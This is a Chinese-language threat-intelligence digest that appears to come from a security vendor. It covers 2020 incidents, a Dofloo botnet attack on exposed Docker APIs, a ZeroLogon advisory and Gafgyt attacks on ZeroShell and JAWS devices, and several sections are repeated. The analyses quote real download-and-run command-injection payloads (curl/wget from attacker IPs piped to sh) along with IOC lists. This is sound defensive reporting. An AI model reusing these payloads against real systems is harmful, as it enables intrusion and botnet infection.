威胁事件情报

1.Emotet攻击魁北克司法部

发布时间:2020年9月16日

情报来源:

https://www.welivesecurity.com/2020/09/16/emotet-quebec-department-justice-eset/

情报摘要:

魁北克司法部遭受网络攻击,攻击者通过电子邮件投递Emotet 恶意软件。黑客涉嫌窃取大约300名员工的个人信息。

2.英国警告对教育部门的勒索软件威胁激增

发布时间:2020年9月18日

https://www.bleepingcomputer.com/news/security/uk-warns-of-surge-in-ransomware-threats-against-education-sector/

情报摘要:

英国国家网络安全中心(NCSC)已发布有关针对教育机构的勒索软件事件激增的警报,敦促他们遵循最近更新的缓解恶意软件攻击的建议。NCSC在8月份调查了针对该国学校,学院和大学的勒索软件攻击事件增多之后,发出了此警告。

除了对勒索软件威胁进行预警之外,政府组织还提供了常见的针对此类网络攻击的初始感染媒介:不安全的远程桌面协议(RDP)配置;未修补的软件和硬件设备中的漏洞,尤其是网络边缘的设备,例如防火墙和VPN;网络钓鱼电子邮件。

3.Maze勒索软件现在通过虚拟机加密,以逃避检测

发布时间:2020年9月17日

情报来源:

https://www.bleepingcomputer.com/news/security/maze-ransomware-now-encrypts-via-virtual-machines-to-evade-detection/

情报摘要:

迷宫勒索软件操作者采用了Ragnar Locker团伙先前使用的策略;从虚拟机中加密计算机。虚拟机会将主机驱动器安装为远程共享,然后在虚拟机中运行勒索软件以加密共享文件。在攻击中,Maze部署了一个MSI文件,该文件将VirtualBox VM软件以及自定义的Windows 7虚拟机安装在服务器上。之后,再启动虚拟机加密共享的主机文件。 

4.Cerberus银行木马的源代码在地下论坛上泄露

发布时间:2020年9月16日

情报来源:

https://securityaffairs.co/wordpress/108373/cyber-crime/cerberus-source-code-leaked.html

情报摘要:

在拍卖失败后,臭名昭著的Cerberus银行木马的源代码已在地下黑客论坛上免费发布。整个项目包括组件的源代码(恶意APK,管理面板和C2代码),安装指南,用于设置的脚本集和具有有效许可证的客户列表,以及与客户和潜在的买家。该恶意软件实现了银行木马功能,例如使用覆盖攻击,拦截SMS消息和访问联系人列表的功能。

5. 滥用Google App Engine功能来创建无限网络钓鱼页面

发布时间:2020年9月20日

情报来源:

https://www.bleepingcomputer.com/news/security/google-app-engine-feature-abused-to-create-unlimited-phishing-pages/

情报摘要:

研究人员最近发现的一项技术表明,如何利用Google的App Engine域来传递网络钓鱼和恶意软件,同时又不被领先的企业安全产品所检测到。Google App Engine是一个基于云的服务平台,用于在Google的服务器上开发和托管Web应用。

诈骗者通常使用云服务来创建被分配了子域的恶意应用。然后,他们在此处托管网络钓鱼页面。或者他们可能将该应用程序用作命令和控制(C2)服务器来传递恶意软件有效负载。

6. 在物联网设备中寻找复杂的恶意软件

发布时间:2020年9月23日

情报来源:

https://securelist.com/looking-for-sophisticated-malware-in-iot-devices/98530/

情报摘要:

这篇文章的动机之一是鼓励对这个主题感兴趣的其他研究人员加入,分享想法和知识,并帮助建立更多功能,以便更好地保护我们的智能设备。物联网设备(例如Zigbee)中使用的通信协议中还存在一些漏洞,攻击者可以利用这些漏洞来将设备定为目标并将恶意软件传播到网络中的其他设备,类似于计算机蠕虫。

漏洞情报

1.Google Chrome PDFium内存损坏导致代码执行

发布时间:2020年9月14日

情报来源:

https://blog.talosintelligence.com/2020/09/vuln-spotlight-google-pdfium-sept-2020.html

情报摘要:

攻击者可能会利用Google Chrome的PDFium功能破坏内存并可能执行远程代码。Chrome是一种流行的免费网络浏览器,可在所有操作系统上使用。PDFium允许用户在Chrome中打开PDF。我们最近发现了一个漏洞,该漏洞使攻击者可以将恶意网页发送给用户,然后导致越界访问内存。

 2.Apple Safari远程执行代码漏洞

发布时间:2020年9月17日

情报来源:

https://blog.talosintelligence.com/2020/09/vuln-spotlight-apple-safari-sept-2020.html

情报摘要:

Apple Safari Web浏览器的Webkit功能中包含一个远程执行代码漏洞。具体来说,攻击者可能会在Safari中使用的Webkit DOM呈现系统WebCore中触发“先释放后使用”条件。这可能使攻击者能够在受害机器上执行远程代码。用户需要在Safari中打开特制的恶意网页才能触发此漏洞。 

3.数十亿设备或将受到新的“ BLESA”蓝牙安全漏洞的攻击

发布时间:2020年9月18日

情报来源:

https://mp.weixin.qq.com/s/VUUoRD-lM8ZZyJEs0rh1eA

情报摘要:

数以亿计的智能手机、平板电脑、笔记本电脑和物联网设备正在使用蓝牙软件,需要警觉的是,这些软件很容易受到今年夏天披露的一个新的安全漏洞的攻击。该漏洞被称为BLESA (Bluetooth Low Energy Spoofing Attack),会影响运行Bluetooth Low Energy (BLE)协议的设备。普渡大学( Purdue University )组成的一个研究团队在着手调查BLE协议后,发现了安全问题:附近的攻击者可以绕过重连接验证,并向带有错误信息的BLE设备发送欺骗数据,并诱导使用者和自动化流程做出错误决定。

4.Spring Framework反射型文件下载漏洞风险通告

发布时间:2020年9月22日

情报来源:

https://mp.weixin.qq.com/s/SYXhJrVz87jpMB-V0Zx_LA

情报摘要:

VMware Tanzu发布安全公告,在Spring Framework版本5.2.0-5.2.8、5.1.0-5.1.17、5.0.0-5.0.18、4.3.0-4.3.28和较旧的不受支持的版本中,公布了一个存在于Spring Framework中的反射型文件下载(Reflected File Download,RFD)漏洞(CVE-2020-5421)。 

CVE-2020-5421漏洞可通过jsessionid路径参数,绕过防御RFD攻击的保护。攻击者通过向用户发送带有批处理脚本扩展名的URL,使用户下载并执行文件,从而危害系统。VMware Tanzu官方已发布修复漏洞的新版本。

5.The Return of Raining SYSTEM Shells with Citrix Workspace app

发布时间:2020年9月21日

情报来源:

https://www.pentestpartners.com/security-blog/the-return-of-raining-system-shells-with-citrix-workspace-app/

情报摘要:

7月份国外安全研究人员记录了一个新的Citrix Workspace漏洞,该漏洞使攻击者可以在SYSTEM帐户下远程执行任意命令。在对初始修复程序进行了进一步研究之后,又发现了一个新的攻击点:问题的核心在于远程命令行注入漏洞,攻击者可以使用恶意MSI转换绕过Citrix签名的MSI安装程序。

更新的Citrix安全公告:https://support.citrix.com/article/CTX277662,漏洞描述:

在Windows的Citrix Workspace应用程序的自动更新服务中发现了一个漏洞,该漏洞可能导致:1.本地用户将其特权级别提升为运行Windows的Citrix Workspace应用程序的计算机上的管理员级别; 2.启用Windows文件共享(SMB)后,运行Citrix Workspace应用程序的计算机受到远程威胁。

6.Jenkins公告多个插件的安全漏洞(2020.9.23)

发布时间:2020年9月24日

情报来源:

https://s.tencent.com/research/bsafe/1137.html

情报摘要:

Jenkins官方9月23日公告多个插件存在的安全漏洞,这些漏洞可能导致远程代码执行、沙箱绕过、CSRF攻击、XSS漏洞攻击等后果。漏洞涉及五个插件:Implied Labels Plugin、Liquibase Runner Plugin、Lockable Resources Plugin、Script Security Plugin、Warnings Plugin。 

7.ZeroLogon(CVE-2020-1472)-攻击与防御

发布时间:2020年9月24日

情报来源:

https://blog.zsec.uk/zerologon-attacking-defending/

情报摘要:

从红蓝对抗的角度了解CVE-2020-1472漏洞,以及如何检测、修补和破解ZeroLogon。结论是:就攻击而言,该漏洞有点改变游戏规则,漏洞利用是如此简单,利用漏洞进行攻击会带来非常有害的后果。无论您坐在篱笆的哪一侧,都应该修补此问题,并鼓励您的客户也这样做。在实时环境中进行开发时应格外小心,因为它会破坏域,并且没有备份机器密码,修复它并不是一个有趣的过程!

威胁事件情报

1.Emotet攻击魁北克司法部

发布时间:2020年9月16日

情报来源:

https://www.welivesecurity.com/2020/09/16/emotet-quebec-department-justice-eset/

情报摘要:

魁北克司法部遭受网络攻击,攻击者通过电子邮件投递Emotet 恶意软件。黑客涉嫌窃取大约300名员工的个人信息。

2.英国警告对教育部门的勒索软件威胁激增

发布时间:2020年9月18日

https://www.bleepingcomputer.com/news/security/uk-warns-of-surge-in-ransomware-threats-against-education-sector/

情报摘要:

英国国家网络安全中心(NCSC)已发布有关针对教育机构的勒索软件事件激增的警报,敦促他们遵循最近更新的缓解恶意软件攻击的建议。NCSC在8月份调查了针对该国学校,学院和大学的勒索软件攻击事件增多之后,发出了此警告。

除了对勒索软件威胁进行预警之外,政府组织还提供了常见的针对此类网络攻击的初始感染媒介:不安全的远程桌面协议(RDP)配置;未修补的软件和硬件设备中的漏洞,尤其是网络边缘的设备,例如防火墙和VPN;网络钓鱼电子邮件。

3.Maze勒索软件现在通过虚拟机加密,以逃避检测

发布时间:2020年9月17日

情报来源:

https://www.bleepingcomputer.com/news/security/maze-ransomware-now-encrypts-via-virtual-machines-to-evade-detection/

情报摘要:

迷宫勒索软件操作者采用了Ragnar Locker团伙先前使用的策略;从虚拟机中加密计算机。虚拟机会将主机驱动器安装为远程共享,然后在虚拟机中运行勒索软件以加密共享文件。在攻击中,Maze部署了一个MSI文件,该文件将VirtualBox VM软件以及自定义的Windows 7虚拟机安装在服务器上。之后,再启动虚拟机加密共享的主机文件。 

4.Cerberus银行木马的源代码在地下论坛上泄露

发布时间:2020年9月16日

情报来源:

https://securityaffairs.co/wordpress/108373/cyber-crime/cerberus-source-code-leaked.html

情报摘要:

在拍卖失败后,臭名昭著的Cerberus银行木马的源代码已在地下黑客论坛上免费发布。整个项目包括组件的源代码(恶意APK,管理面板和C2代码),安装指南,用于设置的脚本集和具有有效许可证的客户列表,以及与客户和潜在的买家。该恶意软件实现了银行木马功能,例如使用覆盖攻击,拦截SMS消息和访问联系人列表的功能。

5. 滥用Google App Engine功能来创建无限网络钓鱼页面

发布时间:2020年9月20日

情报来源:

https://www.bleepingcomputer.com/news/security/google-app-engine-feature-abused-to-create-unlimited-phishing-pages/

情报摘要:

研究人员最近发现的一项技术表明,如何利用Google的App Engine域来传递网络钓鱼和恶意软件,同时又不被领先的企业安全产品所检测到。Google App Engine是一个基于云的服务平台,用于在Google的服务器上开发和托管Web应用。

诈骗者通常使用云服务来创建被分配了子域的恶意应用。然后,他们在此处托管网络钓鱼页面。或者他们可能将该应用程序用作命令和控制(C2)服务器来传递恶意软件有效负载。

6. 在物联网设备中寻找复杂的恶意软件

发布时间:2020年9月23日

情报来源:

https://securelist.com/looking-for-sophisticated-malware-in-iot-devices/98530/

情报摘要:

这篇文章的动机之一是鼓励对这个主题感兴趣的其他研究人员加入,分享想法和知识,并帮助建立更多功能,以便更好地保护我们的智能设备。物联网设备(例如Zigbee)中使用的通信协议中还存在一些漏洞,攻击者可以利用这些漏洞来将设备定为目标并将恶意软件传播到网络中的其他设备,类似于计算机蠕虫。

漏洞情报

1.Google Chrome PDFium内存损坏导致代码执行

发布时间:2020年9月14日

情报来源:

https://blog.talosintelligence.com/2020/09/vuln-spotlight-google-pdfium-sept-2020.html

情报摘要:

攻击者可能会利用Google Chrome的PDFium功能破坏内存并可能执行远程代码。Chrome是一种流行的免费网络浏览器,可在所有操作系统上使用。PDFium允许用户在Chrome中打开PDF。我们最近发现了一个漏洞,该漏洞使攻击者可以将恶意网页发送给用户,然后导致越界访问内存。

 2.Apple Safari远程执行代码漏洞

发布时间:2020年9月17日

情报来源:

https://blog.talosintelligence.com/2020/09/vuln-spotlight-apple-safari-sept-2020.html

情报摘要:

Apple Safari Web浏览器的Webkit功能中包含一个远程执行代码漏洞。具体来说,攻击者可能会在Safari中使用的Webkit DOM呈现系统WebCore中触发“先释放后使用”条件。这可能使攻击者能够在受害机器上执行远程代码。用户需要在Safari中打开特制的恶意网页才能触发此漏洞。 

3.数十亿设备或将受到新的“ BLESA”蓝牙安全漏洞的攻击

发布时间:2020年9月18日

情报来源:

https://mp.weixin.qq.com/s/VUUoRD-lM8ZZyJEs0rh1eA

情报摘要:

数以亿计的智能手机、平板电脑、笔记本电脑和物联网设备正在使用蓝牙软件,需要警觉的是,这些软件很容易受到今年夏天披露的一个新的安全漏洞的攻击。该漏洞被称为BLESA (Bluetooth Low Energy Spoofing Attack),会影响运行Bluetooth Low Energy (BLE)协议的设备。普渡大学( Purdue University )组成的一个研究团队在着手调查BLE协议后,发现了安全问题:附近的攻击者可以绕过重连接验证,并向带有错误信息的BLE设备发送欺骗数据,并诱导使用者和自动化流程做出错误决定。

4.Spring Framework反射型文件下载漏洞风险通告

发布时间:2020年9月22日

情报来源:

https://mp.weixin.qq.com/s/SYXhJrVz87jpMB-V0Zx_LA

情报摘要:

VMware Tanzu发布安全公告,在Spring Framework版本5.2.0-5.2.8、5.1.0-5.1.17、5.0.0-5.0.18、4.3.0-4.3.28和较旧的不受支持的版本中,公布了一个存在于Spring Framework中的反射型文件下载(Reflected File Download,RFD)漏洞(CVE-2020-5421)。 

CVE-2020-5421漏洞可通过jsessionid路径参数,绕过防御RFD攻击的保护。攻击者通过向用户发送带有批处理脚本扩展名的URL,使用户下载并执行文件,从而危害系统。VMware Tanzu官方已发布修复漏洞的新版本。

5.The Return of Raining SYSTEM Shells with Citrix Workspace app

发布时间:2020年9月21日

情报来源:

https://www.pentestpartners.com/security-blog/the-return-of-raining-system-shells-with-citrix-workspace-app/

情报摘要:

7月份国外安全研究人员记录了一个新的Citrix Workspace漏洞,该漏洞使攻击者可以在SYSTEM帐户下远程执行任意命令。在对初始修复程序进行了进一步研究之后,又发现了一个新的攻击点:问题的核心在于远程命令行注入漏洞,攻击者可以使用恶意MSI转换绕过Citrix签名的MSI安装程序。

更新的Citrix安全公告:https://support.citrix.com/article/CTX277662,漏洞描述:

在Windows的Citrix Workspace应用程序的自动更新服务中发现了一个漏洞,该漏洞可能导致:1.本地用户将其特权级别提升为运行Windows的Citrix Workspace应用程序的计算机上的管理员级别; 2.启用Windows文件共享(SMB)后,运行Citrix Workspace应用程序的计算机受到远程威胁。

6.Jenkins公告多个插件的安全漏洞(2020.9.23)

发布时间:2020年9月24日

情报来源:

https://s.tencent.com/research/bsafe/1137.html

情报摘要:

Jenkins官方9月23日公告多个插件存在的安全漏洞,这些漏洞可能导致远程代码执行、沙箱绕过、CSRF攻击、XSS漏洞攻击等后果。漏洞涉及五个插件:Implied Labels Plugin、Liquibase Runner Plugin、Lockable Resources Plugin、Script Security Plugin、Warnings Plugin。 

7.ZeroLogon(CVE-2020-1472)-攻击与防御

发布时间:2020年9月24日

情报来源:

https://blog.zsec.uk/zerologon-attacking-defending/

情报摘要:

从红蓝对抗的角度了解CVE-2020-1472漏洞,以及如何检测、修补和破解ZeroLogon。结论是:就攻击而言,该漏洞有点改变游戏规则,漏洞利用是如此简单,利用漏洞进行攻击会带来非常有害的后果。无论您坐在篱笆的哪一侧,都应该修补此问题,并鼓励您的客户也这样做。在实时环境中进行开发时应格外小心,因为它会破坏域,并且没有备份机器密码,修复它并不是一个有趣的过程!

一、背景

腾讯安全威胁情报中心检测到Dofloo(AESDDoS)僵尸网络正批量扫描和攻击Docker容器。部分云主机上部署的Docker容器没有针对远程访问做安全认证,存在Remote API允许未授权使用漏洞且暴露在公网,导致黑客通过漏洞入侵并植入Dofloo僵尸网络木马。一旦被植入Dofloo僵尸网络木马,受控云主机会泄露敏感信息、接收C2指令、执行DDoS攻击。

云计算兴起后,服务器硬件扩展非常便利,软件服务部署成为了瓶颈,Docker作为开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器,因而逐渐得到广泛应用。而开发者在部署Docker时未对相关服务进行正确合理的配置导致其容易成为黑客入侵的路径之一,之前已有H2Miner利用Docker漏洞进行入侵挖矿的案例被披露(

https://mp.weixin.qq.com/s/iNq8SdTZ9IrttAoQYLJw5A)。此次Dofloo僵尸网络入侵系统后,会搜集系统敏感信息并加密上传,接收C&C服务器指令,执行各类DDoS攻击。

二、详细分析

在此次攻击中,攻击者首先通过向端口2375(与Docker守护进程通信的默认端口)发送TCPSYN数据包对给定的IP范围进行批量扫描。确定开放端口的目标IP后,发送请求调用/containers/json接口获取正在运行中的容器列表,之后使用Docker EXEC命令执行以下shell访问公开主机中所有正在运行的容器并下载木马Linux2.7。

获取容器列表:

图1

图1

针对运行状态的容器利用Docker EXEC执行木马下载命令:

wget -P /tmp/ http[:]//49.235.238.111:88/Linux2.7

图2

图2

被下载的Dofloo僵尸网络木马Linux2.7会连接到49.235.238.111:48080来发送和接收来自攻击者的远程shell命令。

图3

图3

图4

图4

Dofloo僵尸网络还会在从被感染系统窃取信息,包括操作系统版本,CPU型号、速度和类型。

图5

图5

通过将自身路径写入/etc/rc.local、/etc/rc.d/rc.local、/etc/init.d/boot.local文件中以添加为自启动项。

图6

图6

使用AES算法对窃取的系统信息和命令和控制(C&C)数据进行加密。

图7

图7

此Dofloo变种能够发起各种类型的DDoS攻击,包括DNS、SYN,LSYN,UDP,UDPS,TCP和CC Flood。

图8

图8

IOCs

C&C

49.235.238.111:48080

175.24.123.205: 48080

IP

49.235.238.111

89.40.73.126

175.24.123.205

URL

http[:]//49.235.238.111[:]88/Linux2.7

http[:]//49.235.238.111/Lov.sh

http[:]//49.235.238.111/lix

http[:]//49.235.238.111/Verto

http[:]//49.235.238.111[:]88/NgYx

http[:]//49.235.238.111/linux-arm

http[:]//49.235.238.111/shre.sh

http[:]//89.40.73.126[:]8080/Linux2.7

http[:]//89.40.73.126/linux2.6

http[:]//89.40.73.126[:]8080/linux-arm

http[:]//89.40.73.126[:]8080/Linux2.6

http[:]//89.40.73.126[:]8080/YmY

http[:]//89.40.73.126[:]8080/LTF

http[:]//89.40.73.126[:]8080/NgYx

http[:]//89.40.73.126[:]8080/Mar

http[:]//89.40.73.126[:]8080/linux2.6

http[:]//89.40.73.126[:]8080/Flood

http[:]//175.24.123.205:88/Fck

MD5

参考链接:

https://www.trendmicro.com/en_us/research/19/f/aesddos-botnet-malware-infiltrates-containers-via-exposed-docker-apis.html

https://github.com/SPuerBRead/Docker-Remote-API-Exploit/blob/master/dockerAPI_Exploit.py

一、背景

腾讯安全威胁情报中心检测到Dofloo(AESDDoS)僵尸网络正批量扫描和攻击Docker容器。部分云主机上部署的Docker容器没有针对远程访问做安全认证,存在Remote API允许未授权使用漏洞且暴露在公网,导致黑客通过漏洞入侵并植入Dofloo僵尸网络木马。一旦被植入Dofloo僵尸网络木马,受控云主机会泄露敏感信息、接收C2指令、执行DDoS攻击。

云计算兴起后,服务器硬件扩展非常便利,软件服务部署成为了瓶颈,Docker作为开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器,因而逐渐得到广泛应用。而开发者在部署Docker时未对相关服务进行正确合理的配置导致其容易成为黑客入侵的路径之一,之前已有H2Miner利用Docker漏洞进行入侵挖矿的案例被披露(

https://mp.weixin.qq.com/s/iNq8SdTZ9IrttAoQYLJw5A)。此次Dofloo僵尸网络入侵系统后,会搜集系统敏感信息并加密上传,接收C&C服务器指令,执行各类DDoS攻击。

二、详细分析

在此次攻击中,攻击者首先通过向端口2375(与Docker守护进程通信的默认端口)发送TCPSYN数据包对给定的IP范围进行批量扫描。确定开放端口的目标IP后,发送请求调用/containers/json接口获取正在运行中的容器列表,之后使用Docker EXEC命令执行以下shell访问公开主机中所有正在运行的容器并下载木马Linux2.7。

获取容器列表:

图1

图1

针对运行状态的容器利用Docker EXEC执行木马下载命令:

wget -P /tmp/ http[:]//49.235.238.111:88/Linux2.7

图2

图2

被下载的Dofloo僵尸网络木马Linux2.7会连接到49.235.238.111:48080来发送和接收来自攻击者的远程shell命令。

图3

图3

图4

图4

Dofloo僵尸网络还会在从被感染系统窃取信息,包括操作系统版本,CPU型号、速度和类型。

图5

图5

通过将自身路径写入/etc/rc.local、/etc/rc.d/rc.local、/etc/init.d/boot.local文件中以添加为自启动项。

图6

图6

使用AES算法对窃取的系统信息和命令和控制(C&C)数据进行加密。

图7

图7

此Dofloo变种能够发起各种类型的DDoS攻击,包括DNS、SYN,LSYN,UDP,UDPS,TCP和CC Flood。

图8

图8

IOCs

C&C

49.235.238.111:48080

175.24.123.205: 48080

IP

49.235.238.111

89.40.73.126

175.24.123.205

URL

http[:]//49.235.238.111[:]88/Linux2.7

http[:]//49.235.238.111/Lov.sh

http[:]//49.235.238.111/lix

http[:]//49.235.238.111/Verto

http[:]//49.235.238.111[:]88/NgYx

http[:]//49.235.238.111/linux-arm

http[:]//49.235.238.111/shre.sh

http[:]//89.40.73.126[:]8080/Linux2.7

http[:]//89.40.73.126/linux2.6

http[:]//89.40.73.126[:]8080/linux-arm

http[:]//89.40.73.126[:]8080/Linux2.6

http[:]//89.40.73.126[:]8080/YmY

http[:]//89.40.73.126[:]8080/LTF

http[:]//89.40.73.126[:]8080/NgYx

http[:]//89.40.73.126[:]8080/Mar

http[:]//89.40.73.126[:]8080/linux2.6

http[:]//89.40.73.126[:]8080/Flood

http[:]//175.24.123.205:88/Fck

MD5

参考链接:

https://www.trendmicro.com/en_us/research/19/f/aesddos-botnet-malware-infiltrates-containers-via-exposed-docker-apis.html

https://github.com/SPuerBRead/Docker-Remote-API-Exploit/blob/master/dockerAPI_Exploit.py

漏洞描述

9月14日,腾讯安全威胁情报中心注意到有国外安全厂商将NetLogon特权提升漏洞(CVE-2020-1472)的漏洞技术分析和验证脚本公开上传到github,该漏洞高度危险,漏洞利用代码公开意味着大规模的漏洞利用将很快到来。

编号为CVE-2020-1472的NetLogon特权提升漏洞,是微软8月份发布例行安全公告时披露的,该漏洞评分为10分,为严重等级,即影响面广,漏洞利用后果严重。腾讯安全威胁情报中心在8月12日当天曾经发文提醒企业用户高度关注。

当攻击者使用 Netlogon 远程协议 (MS-NRPC) 建立与域控制器连接的易受攻击的 Netlogon 安全通道时,存在特权提升漏洞。成功利用此漏洞的攻击者可以在网络中的设备上运行经特殊设计的应用程序。

攻击者利用此漏洞,无须身份验证,可获取域控制器的管理员权限。

漏洞影响范围

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2012

Windows Server 2012 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 R2 (Server Core installation)

Windows Server 2016

Windows Server 2016 (Server Core installation)

Windows Server 2019

Windows Server 2019 (Server Core installation)

Windows Server, version 1903 (Server Core installation)

Windows Server, version 1909 (Server Core installation)

Windows Server, version 2004 (Server Core installation)

漏洞修复方案:

1.腾讯安全专家建议用户尽快使用Windows Update安装补丁。

2.建议企业用户参考微软官方文档强制实施安全 RPC 来解决该漏洞。

步骤1:安装 2020年8月11日的安全更新

步骤2:在DC上开启强制模式

具体配置可参考微软官方文档

《如何管理与 CVE-2020-1472 相关联的 Netlogon 安全频道连接中的更改》

https://support.microsoft.com/zh-cn/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc

时间线:

2020.8.11 微软官方发布漏洞公告;

2020.8.12 腾讯安全威胁情报中心发布漏洞风险通告;

2020.9.11 NetLogon特权提升漏洞测试脚本和技术分析文章在github被公开;

2020.9.14 腾讯安全威胁情报中心再次发布CVE-2020-1472漏洞风险通告。

参考链接:

https://support.microsoft.com/zh-cn/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc

https://github.com/SecuraBV/CVE-2020-1472

https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2020-1472

漏洞描述

9月14日,腾讯安全威胁情报中心注意到有国外安全厂商将NetLogon特权提升漏洞(CVE-2020-1472)的漏洞技术分析和验证脚本公开上传到github,该漏洞高度危险,漏洞利用代码公开意味着大规模的漏洞利用将很快到来。

编号为CVE-2020-1472的NetLogon特权提升漏洞,是微软8月份发布例行安全公告时披露的,该漏洞评分为10分,为严重等级,即影响面广,漏洞利用后果严重。腾讯安全威胁情报中心在8月12日当天曾经发文提醒企业用户高度关注。

当攻击者使用 Netlogon 远程协议 (MS-NRPC) 建立与域控制器连接的易受攻击的 Netlogon 安全通道时,存在特权提升漏洞。成功利用此漏洞的攻击者可以在网络中的设备上运行经特殊设计的应用程序。

攻击者利用此漏洞,无须身份验证,可获取域控制器的管理员权限。

漏洞影响范围

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2012

Windows Server 2012 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 R2 (Server Core installation)

Windows Server 2016

Windows Server 2016 (Server Core installation)

Windows Server 2019

Windows Server 2019 (Server Core installation)

Windows Server, version 1903 (Server Core installation)

Windows Server, version 1909 (Server Core installation)

Windows Server, version 2004 (Server Core installation)

漏洞修复方案:

1.腾讯安全专家建议用户尽快使用Windows Update安装补丁。

2.建议企业用户参考微软官方文档强制实施安全 RPC 来解决该漏洞。

步骤1:安装 2020年8月11日的安全更新

步骤2:在DC上开启强制模式

具体配置可参考微软官方文档

《如何管理与 CVE-2020-1472 相关联的 Netlogon 安全频道连接中的更改》

https://support.microsoft.com/zh-cn/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc

时间线:

2020.8.11 微软官方发布漏洞公告;

2020.8.12 腾讯安全威胁情报中心发布漏洞风险通告;

2020.9.11 NetLogon特权提升漏洞测试脚本和技术分析文章在github被公开;

2020.9.14 腾讯安全威胁情报中心再次发布CVE-2020-1472漏洞风险通告。

参考链接:

https://support.microsoft.com/zh-cn/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc

https://github.com/SecuraBV/CVE-2020-1472

https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2020-1472

一、背景

腾讯安全威胁情报中心检测到有境外IP针对国内Linux服务器的远程命令注入攻击。黑客通过批量扫描80、5555、60001端口来发现易受攻击的Linux服务器、android设备以及监控摄像头设备并利用ZeroShell远程代码执行漏洞(CVE-2019-12725)、bash shell漏洞、JAWS Webserver未授权shell命令执行漏洞进行攻击,攻击成功后下载Gafgyt家族僵尸网络木马。

Gafgyt是一种流行的僵尸网络程序,被认为是Mirai的前身,其源代码在2015年初被部分泄露。Gafgyt主要通过telent弱口令以及命令注入漏洞等方式进行攻击传播,通过感染基于Linux的IoT设备(包括基于Linux系统的路由器、智能摄像头等设备)来发起DDoS攻击,攻击类型以UDP、TCP和HTTP攻击为主。

二、详细分析

腾讯安全专家在日常安全巡检过程中发现攻击线索,腾讯云防火墙检测到攻击来源52.224.202.238:43787,针对目标系统80端口的命令注入攻击。

该攻击的payload为:

GET/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd/tmp;curl -O http[:]//5.206.227.228/zero;sh zero;" HTTP/1.0

分析发现这次攻击利用的是ZeroShell远程代码执行漏洞(CVE-2019-12725),该漏洞在2019年7月被发现,攻击者可以通过构造具有固定特征的请求数据发送至目标系统,从而导致恶意代码执行。(ZeroShell是一套用于服务器和嵌入式设备的Linux发行版,它主要为局域网提供所需要的网络服务)

漏洞攻击成功后通过curl命令下载执行shell脚本zero,zero继续通过curl下载Gafgyt木马bot.x86_64和bot.x86并启动执行,分别为64位和32位木马文件。

bot.x86为Gafgyt僵尸网络家族木马样本,启动后首先打印特征字符串“9xsspnvgc8aj5pi7m28p”。

然后针对Linux服务器、android设备、视频监控设备的80、5555、60001端口进行扫描。

针对开放端口的设备利用ZeroShell远程代码执行漏洞(CVE-2019-12725)攻击,执行payload:

GET/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd/tmp;curl -O http[:]//5.206.227.228/zero;sh zero;"

利用bash shell漏洞攻击,执行payload:

shell[:]cd /data/local/tmp; busybox wgethttp[:]//5.206.227.228/wget -O -> wwww; sh wwww; curl -Ohttp[:]//5.206.227.228/curl; sh curl;rm wwww curl

利用JAWS Webserver未授权shell命令执行漏洞攻击,执行Payload:

GET /shell?cd /tmp;wgethttp[:]//5.206.227.228/jaw;sh jaw;

ZeroShell远程代码执行漏洞(CVE-2019-12725)的攻击流量:


IOCs

IP

5.206.227.228

URL

http[:]//5.206.227.228/zero

http[:]//5.206.227.228/curl

http[:]//5.206.227.228/wget

http[:]//5.206.227.228/k

http[:]//5.206.227.228/bot.x86_64

http[:]//5.206.227.228/bot.x86

http[:]//5.206.227.228/bot.arm5

http[:]//5.206.227.228/bot.arm6

http[:]//5.206.227.228/bot.arm7

http[:]//5.206.227.228/bot.aarch64

http[:]//5.206.227.228/bot.mips

http[:]//5.206.227.228/bot.mipsel

MD5

2520fc7d13ac3876cca580791d1c33a8

cc84fcc23567228337e45c9fbb78699f

10b9f21795e5ffbd52c407617d0bd4ef

38d8de098c7e560a34dabf8c1a2ed5f0

12b021bcd199585e86dd27523010105b

0e12d891a2fe2cecb6781f3e4d3551b4

aa389e7fb64cf274334712ecb3dfd2cd

2dabb8e039a77f0eb67e938d798ab7c4

03a7f039321ffb9938cc67d65c0b6459

a9109419954a421b712d48ea22b0a7b9

52fb891c536fe449b896f0f2cd2490d4

e2cec25584bfec1e56ee82f350dfeaf9

87859507c0d23793c78d86e0963a7a37

ba903efc3d2e37105e57232e7652b85c

891bbf7b562b34332fac12df2c29ddbb

6d9953a03c568ad97595723d1a09b291

aa9e9627ed6aba6415fb45f742f4f8dd

参考链接:

https://www.anquanke.com/vul/id/1030688

https://www.tarlogic.com/advisories/zeroshell-rce-root.txt

https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/

https://github.com/ifding/iot-malware


一、背景

腾讯安全威胁情报中心检测到有境外IP针对国内Linux服务器的远程命令注入攻击。黑客通过批量扫描80、5555、60001端口来发现易受攻击的Linux服务器、android设备以及监控摄像头设备并利用ZeroShell远程代码执行漏洞(CVE-2019-12725)、bash shell漏洞、JAWS Webserver未授权shell命令执行漏洞进行攻击,攻击成功后下载Gafgyt家族僵尸网络木马。

Gafgyt是一种流行的僵尸网络程序,被认为是Mirai的前身,其源代码在2015年初被部分泄露。Gafgyt主要通过telent弱口令以及命令注入漏洞等方式进行攻击传播,通过感染基于Linux的IoT设备(包括基于Linux系统的路由器、智能摄像头等设备)来发起DDoS攻击,攻击类型以UDP、TCP和HTTP攻击为主。

二、详细分析

腾讯安全专家在日常安全巡检过程中发现攻击线索,腾讯云防火墙检测到攻击来源52.224.202.238:43787,针对目标系统80端口的命令注入攻击。

该攻击的payload为:

